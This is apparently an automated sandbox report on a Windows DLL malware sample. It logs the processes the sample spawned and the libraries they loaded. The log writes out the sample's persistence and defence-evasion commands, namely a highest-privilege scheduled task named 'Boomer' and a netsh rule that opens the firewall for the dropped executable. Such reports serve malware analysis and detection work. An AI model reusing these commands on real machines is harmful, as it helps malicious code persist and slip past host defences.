Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 616
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 544
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,bz_internal_error
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 660
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,g2mcomm_winmain
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 608
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",DllMain
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",bz_internal_error
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",g2mcomm_winmain
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 656
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7188 -s 608
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7208 -s 616
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\iDQiPwFWUp\ybtrrus.exe "C:\iDQiPwFWUp\ybtrrus.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 672
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\pnVcakKiqh\ybtrrus.exe "C:\pnVcakKiqh\ybtrrus.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 684
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: unknown	Process created: C:\iDQiPwFWUp\ybtrrus.exe C:\iDQiPwFWUp\ybtrrus.exe
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,bz_internal_error	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,g2mcomm_winmain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",bz_internal_error	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",g2mcomm_winmain	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\iDQiPwFWUp\ybtrrus.exe "C:\iDQiPwFWUp\ybtrrus.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\pnVcakKiqh\ybtrrus.exe "C:\pnVcakKiqh\ybtrrus.exe"	Jump to behavior
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: apphelp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: version.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mpr.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wininet.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wsock32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winmm.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: uxtheme.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: devobj.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: msasn1.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_is2022.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_g18030.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_gsm7.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_iscii.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: netapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: netutils.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: olepro32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: msimg32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: kernel.appcore.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: windows.storage.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wldp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: unrar.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: 7zxa.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winhttp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: shfolder.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: iphlpapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: magnification.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wtsapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: d3d9.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dwmapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dwmapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: security.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: secur32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: sspicli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: colorui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mscms.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: userenv.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: coloradapterclient.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: compstui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: inetres.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: textshaping.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: windowscodecs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: propsys.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: profapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wkscli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: cscapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winsta.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: fwpuclnt.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: idndl.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mlang.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: textinputframework.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: coreuicomponents.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: coremessaging.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: ntmarta.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: coremessaging.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: edputil.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: urlmon.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: iertutil.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: srvcli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: appresolver.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: bcp47langs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: slc.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: userenv.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: sppc.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wbemcomn.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: sxs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: napinsp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: pnrpnsp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wshbth.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: nlaapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mswsock.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dnsapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winrnr.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: rasadhlp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: amsi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: d3d10warp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dxcore.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dcomp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: apphelp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: version.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: mpr.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wininet.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wsock32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: winmm.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: uxtheme.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: devobj.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: msasn1.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: c_is2022.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: c_g18030.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: c_gsm7.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: c_iscii.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: netapi32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: netutils.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: olepro32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: msimg32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: kernel.appcore.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: windows.storage.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wldp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: unrar.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: 7zxa.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: winhttp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: shfolder.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: iphlpapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: magnification.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wtsapi32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: d3d9.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: dwmapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: dwmapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: security.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: secur32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: sspicli.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: colorui.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: mscms.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: userenv.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: coloradapterclient.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: compstui.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: inetres.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: textshaping.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: windowscodecs.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: propsys.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: profapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wkscli.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: cscapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: winsta.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: fwpuclnt.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: idndl.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: mlang.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: edputil.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: urlmon.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: iertutil.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: srvcli.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: textinputframework.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: coreuicomponents.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: coremessaging.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: ntmarta.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: coremessaging.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: appresolver.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: bcp47langs.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: slc.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: userenv.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: sppc.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wbemcomn.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: sxs.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: napinsp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: pnrpnsp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wshbth.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: nlaapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: mswsock.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: dnsapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: winrnr.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: rasadhlp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: amsi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: d3d10warp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: dxcore.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
